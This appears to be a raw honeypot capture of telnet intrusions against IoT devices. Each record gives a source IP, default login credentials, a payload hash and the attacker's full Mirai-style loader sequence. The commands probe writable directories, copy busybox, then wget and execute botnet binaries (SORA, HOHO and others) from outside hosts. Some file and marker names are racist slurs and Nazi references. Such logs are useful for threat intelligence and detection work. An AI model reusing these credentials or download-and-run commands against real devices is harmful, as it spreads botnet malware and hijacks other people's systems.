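Columns, one value per line for each record: IP address, User name, Password, SHA256 of the payload file. The lines after the hash are the commands recorded for that record, one per line, until the next IP address begins a new record. A record that shows only one credential line (the 54.38.79.86 record) presumably had an empty or uncaptured field; the values are left as recorded.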
 139.59.138.135
sysadm
sysadm
539973d94276095fdd200fe27ad493ada5219785a8724d914a59e98fb4d2d412
enable
system
linuxshell
shell
sh
>/tmp/.misa && cd /tmp/
>/var/.misa && cd /var/
>/dev/.misa && cd /dev/
>/mnt/.misa && cd /mnt/
>/var/run/.misa && cd /var/run/
>/var/tmp/.misa && cd /var/tmp/
>/.misa && cd /
>/dev/netslink/.misa && cd /dev/netslink/
>/dev/shm/.misa && cd /dev/shm/
>/bin/.misa && cd /bin/
>/etc/.misa && cd /etc/
>/boot/.misa && cd /boot/
>/usr/.misa && cd /usr/
/bin/busybox rm -rf HOHO-U79OL HOHO-9Y8G6
/bin/busybox cp /bin/busybox HOHO-U79OL; >HOHO-U79OL; /bin/busybox chmod 777 HOHO-U79OL; /bin/busybox HOHO
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox HOHO
/bin/busybox wget; /bin/busybox tftp; /bin/busybox HOHO
/bin/busybox wget http://104.248.38.142:80/bins/hoho.x86 -O - > HOHO-U79OL; /bin/busybox chmod 777 HOHO-U79OL; /bin/busybox HOHO
./HOHO-U79OL telnet; /bin/busybox BOTNET
/bin/busybox rm -rf HOHO-9Y8G6; >HOHO-U79OL; /bin/busybox HOHO
 128.199.239.225
root
20080826
bf72021b7b918456833d84e439315ec0f2fd14ecc33ba0cbe6d8517bf6e139f2
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf NiGGeR69xd dropper
/bin/busybox cp /bin/busybox NiGGeR69xd; >NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox SORA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA
/bin/busybox wget http://128.199.239.225:80/bins/sora.x86 -O - > NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
./NiGGeR69xd telnet.loader.x86; /bin/busybox BIGREP
/bin/busybox rm -rf dropper; >NiGGeR69xd; /bin/busybox SORA
 176.223.142.43
root
anko
68af241cad03c4bda568789e8c40c1857d158ac96cf0ee32f750576c61b8137b
enable
system
shell
sh
linuxshell
bah
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf 93OfjHZ2z 41JxrNJ6k
/bin/busybox cp /bin/busybox 93OfjHZ2z; >93OfjHZ2z; /bin/busybox chmod 777 93OfjHZ2z; /bin/busybox HEIL
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox HEIL
/bin/busybox wget; /bin/busybox tftp; /bin/busybox HEIL
/bin/busybox wget http://176.223.142.43:80/akbins/spc.akirag -O - > 93OfjHZ2z; /bin/busybox chmod 777 93OfjHZ2z; /bin/busybox HEIL
./93OfjHZ2z telnet; /bin/busybox HITLER
/bin/busybox rm -rf 41JxrNJ6k; >93OfjHZ2z; /bin/busybox HEIL
 134.209.179.123
root
5up
10865f9bdd0b754008521c244fc100e739bcfc403d0f8f9e187a35cad24d63d2
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf freecookiex86 dropper
/bin/busybox cp /bin/busybox freecookiex86; >freecookiex86; /bin/busybox chmod 777 freecookiex86; /bin/busybox SORA
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox SORA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA
/bin/busybox wget http://134.209.179.123:80/bins/sora.x86 -O - > freecookiex86; /bin/busybox chmod 777 freecookiex86; /bin/busybox SORA
./freecookiex86 telnet.loader.x86; /bin/busybox BIGREP
/bin/busybox rm -rf dropper; >freecookiex86; /bin/busybox SORA
 54.38.79.86
T.S
54910a8c3ec2f339fefb7bb51303e4aad907aa3f113cd40c5564ab1a617b6f63
sh
..
linuxshell
shell
enable
system
hostname SEFA_ID:0084
/bin/busybox SEFA
/bin/busybox ps; /bin/busybox SEFA
/bin/busybox cat /proc/mounts; /bin/busybox SEFA
/bin/busybox echo -e '\x6b\x61\x6d\x69/proc' > /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/sys' > /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/tmp' > /tmp/.nippon; /bin/busybox cat /tmp/.nippon; /bin/busybox rm /tmp/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/overlay' > /overlay/.nippon; /bin/busybox cat /overlay/.nippon; /bin/busybox rm /overlay/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69' > /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev/pts' > /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm /dev/pts/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/sys/kernel/debug' > /sys/kernel/debug/.nippon; /bin/busybox cat /sys/kernel/debug/.nippon; /bin/busybox rm /sys/kernel/debug/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox SEFA
cd /
/bin/busybox cp /bin/echo sefaexecbi; >sefaexecbi; /bin/busybox chmod 777 sefaexecbi; /bin/busybox SEFA
/bin/busybox cat /bin/echo
/bin/busybox SEFA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SEFA
/bin/busybox wget http://54.38.79.86:80/bins/hoho.ppc -O - > sefaexecbi; /bin/busybox chmod 777 sefaexecbi; /bin/busybox SEFA
./sefaexecbi ppc; /bin/busybox AFES
/bin/busybox SEFA
 68.183.77.151
default
OxhlwSG8
205d4bbbd82fd22117946bf5cfc60669a3c2340da94818d9245e998a484b1ef1
enable
system
linuxshell
shell
sh
>/tmp/.misa && cd /tmp/
>/var/.misa && cd /var/
>/dev/.misa && cd /dev/
>/mnt/.misa && cd /mnt/
>/var/run/.misa && cd /var/run/
>/var/tmp/.misa && cd /var/tmp/
>/.misa && cd /
>/dev/netslink/.misa && cd /dev/netslink/
>/dev/shm/.misa && cd /dev/shm/
>/bin/.misa && cd /bin/
>/etc/.misa && cd /etc/
>/boot/.misa && cd /boot/
>/usr/.misa && cd /usr/
/bin/busybox rm -rf HOHO-U79OL HOHO-9Y8G6
/bin/busybox cp /bin/busybox HOHO-U79OL; >HOHO-U79OL; /bin/busybox chmod 777 HOHO-U79OL; /bin/busybox HOHO
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox HOHO
/bin/busybox wget; /bin/busybox tftp; /bin/busybox HOHO
/bin/busybox wget http://104.248.38.142:80/bins/hoho.sh4 -O - > HOHO-U79OL; /bin/busybox chmod 777 HOHO-U79OL; /bin/busybox HOHO
./HOHO-U79OL telnet; /bin/busybox BOTNET
/bin/busybox rm -rf HOHO-9Y8G6; >HOHO-U79OL; /bin/busybox HOHO
 102.165.37.59
default
OxhlwSG8
3005702158e7c0fa7e02d4b65f74bc87425080e2e6e053a4725075ebdbb8fa1c
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf NiGGeR69xd dropper
/bin/busybox cp /bin/busybox NiGGeR69xd; >NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox SORA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA
/bin/busybox wget http://102.165.37.59:80/bins/sora.spc -O - > NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
./NiGGeR69xd telnet.loader.spc; /bin/busybox BIGREP
/bin/busybox rm -rf dropper; >NiGGeR69xd; /bin/busybox SORA
 102.165.37.59
default
OxhlwSG8
3005702158e7c0fa7e02d4b65f74bc87425080e2e6e053a4725075ebdbb8fa1c
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf NiGGeR69xd dropper
/bin/busybox cp /bin/busybox NiGGeR69xd; >NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox SORA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA
/bin/busybox wget http://102.165.37.59:80/bins/sora.spc -O - > NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
./NiGGeR69xd telnet.loader.spc; /bin/busybox BIGREP
/bin/busybox rm -rf dropper; >NiGGeR69xd; /bin/busybox SORA